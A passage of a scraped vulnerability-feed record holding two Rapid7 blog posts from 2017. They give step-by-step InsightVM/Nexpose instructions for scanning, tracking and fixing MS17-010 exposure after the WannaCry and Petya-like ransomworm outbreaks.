dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66971/pastedImage_1.png\"><img class=\"jive-image image-14\" height=\"513\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66971/758-513/pastedImage_1.png\" style=\" width: 804.524px;\" width=\"758\"/></a></span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in &ldquo;vulnerability.vulnKey = &ldquo;MS17-010&#8221;:</span></p><p><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66962/pastedImage_29.png\"><img class=\"image-12 jive-image\" height=\"539\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66962/758-539/pastedImage_29.png\" style=\" width: 833.213px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:2ca40ae4-bf1e-4d07-bca8-48bcdefcec45] -->", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/15/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-15T18:25:42", "lastseen": "2017-05-15T18:48:41", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "history": [{"lastseen": "2017-06-28T04:20:16", "differentElements": ["description", "modified", "published"], "edition": 1, "bulletin": {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "history": [], "modified": "2017-06-28T00:44:35", "type": "rapid7community", "description": "<!-- [DocumentBodyStart:e11d68b4-bb44-4417-8360-8e6ed76a3e01] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several european countries and the US. It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, ExternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds &lt;=&gt; ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: 